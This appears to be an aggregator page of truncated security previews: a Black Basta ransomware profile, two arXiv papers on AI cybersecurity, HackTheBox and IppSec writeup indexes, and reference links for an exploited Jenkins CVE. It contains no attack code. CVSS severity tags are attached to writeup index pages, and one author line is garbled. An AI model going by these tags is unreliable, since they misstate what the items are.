Black Basta first emerged in early 2022. The ransomware family is an evolution of the Hermes/Ryuk/Conti families. Black Basta was heavily advertised in underground cybercrime markets. Black Basta practices double extortion – demanding payment for a decryptor, as well as for the non-release of stolen data. There are Windows and LInux variants of Black Basta ransomware. The group is responsible for hundreds of attacks against global targets of varying sectors.
February 2025 Update: Nearly a year’s worth of Black Basta chat logs have been released on Telegram, providing detailed insight into the groups operational workflow, reconnaissance activities, and specific userID and details o
arXiv
Advancing LLM-Based Security Automation with Customized Group Relative Policy Optimization for Zero-Touch Networks
arxiv_fulltext·2025-12-10
Advancing LLM-Based Security Automation with Customized Group Relative Policy Optimization for Zero-Touch Networks
Advancing LLM-Based Security Automation with Customized Group Relative Policy Optimization for Zero-Touch Networks
Xinye Cao, Graduate Student Member, IEEE, Yihan Lin, Guoshun Nan, Member, IEEE, Qinchuan Zhou,
Yuhang Luo, Yurui Gao, Zeliang Zhang, Haolang Lu, Qimei Cui, Senior Member, IEEE, \ Hou, Member, IEEE, Xiaofeng Tao, Senior Member, IEEE, Tony Q.S. Quek, Fellow, IEEE
This work was supported in part by the National Natural Science Foundation of China under Grant 62471064; in part by the National Research Foundation, Singapore and Infocomm Media Development Authority under its Communications and Connectivity Bridging Funding Initiative; in part by the Beijing Natural Science Foundation Program (No.L232002); in part by Beijing University of Posts and Telecommunications (BUPT) Excellen
arXiv
Cybersecurity AI Benchmark (CAIBench): A Meta-Benchmark for Evaluating Cybersecurity AI Agents
arxiv_fulltext·2025-10-28
Cybersecurity AI Benchmark (CAIBench): A Meta-Benchmark for Evaluating Cybersecurity AI Agents
-1em
## Abstract
Cybersecurity spans multiple interconnected domains, complicating the development of meaningful, labor-relevant benchmarks. Existing benchmarks assess isolated skills rather than integrated performance. We find that pre-trained knowledge of cybersecurity in LLMs does not imply attack and defense abilities, revealing a gap between knowledge and capability. To address this limitation, we present the Cybersecurity AI Benchmark (CAIBench), a modular meta-benchmark framework that allows evaluating LLM models and agents across offensive and defensive cybersecurity domains, taking a step towards meaningfully measuring their labor-relevance. CAIBench integrates five evaluation categories, covering over 10,000 instances: Jeopardy-style CTFs, Attack and Defense CTFs, Cyber Range e
CTF
sherlocks / README
ctf_writeups·CVSS 9.8
[CRITICAL] sherlocks / README
---
layout: default
title: Sherlocks
nav_order: 5
description: "70+ HTB Sherlock DFIR investigation writeups"
permalink: /sherlocks/
---
# HackTheBox Sherlocks - Comprehensive Index
> Complete index of all known HackTheBox Sherlock DFIR investigation labs with writeup links, difficulty ratings, categories, and key techniques.
Sherlocks are defensive security labs that simulate real-world security incidents. You investigate evidence, analyze artifacts, and answer forensic questions to solve the case.
---
## Summary
| Difficulty | Path | Count | Focus |
|------------|------|-------|-------|
| [Easy](#easy-sherlocks) | Easy | 25+ | Log Analysis, Basic DFIR, Simple Malware Triage |
| [Medium](#medium-sherlocks) | Medium | 30+ | Memory Forensics, AD Attacks, Cloud IR, Complex Malware |
|
CTF
ippsec-video-index
ctf_writeups·CVSS 8.6
[HIGH] ippsec-video-index
# IppSec HTB Video Index - Complete Reference
> The most comprehensive index of IppSec's HackTheBox video walkthroughs.
> Data sourced from [ippsec.rocks](https://ippsec.rocks) dataset, GitHub, and community resources.
> Last updated: 2026-04-10
## Stats
| Category | Count |
|----------|-------|
| HTB Machine Walkthroughs | 432 |
| UHC (Ultimate Hacking Championship) | 12 |
| HTB Sherlocks (DFIR) | 7 |
| VulnHub Machines | 4 |
| Tutorials / Methodology / Special | 61 |
| HTB Academy Modules | 17 |
| **Total Unique Content** | **533** |
| Total Searchable Entries (timestamps) | 9,245 |
## Key Resources
| Resource | URL |
|----------|-----|
| YouTube Channel | [youtube.com/ippsec](https://youtube.com/ippsec) |
| Searchable Video Index | [ippsec.rocks](https://ippsec.rocks) |
| GitHub |
http://packetstormsecurity.com/files/176839/Jenkins-2.441-LTS-2.426.3-CVE-2024-23897-Scanner.htmlhttp://packetstormsecurity.com/files/176840/Jenkins-2.441-LTS-2.426.3-Arbitrary-File-Read.htmlhttp://www.openwall.com/lists/oss-security/2024/01/24/6https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/http://packetstormsecurity.com/files/176839/Jenkins-2.441-LTS-2.426.3-CVE-2024-23897-Scanner.htmlhttp://packetstormsecurity.com/files/176840/Jenkins-2.441-LTS-2.426.3-Arbitrary-File-Read.htmlhttp://www.openwall.com/lists/oss-security/2024/01/24/6https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/https://www.vicarius.io/vsociety/posts/the-anatomy-of-a-jenkins-vulnerability-cve-2024-23897-revealed-1https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-23897
2024-01-24
Published
2024-08-19
Added to CISA KEV
Exploited in the wild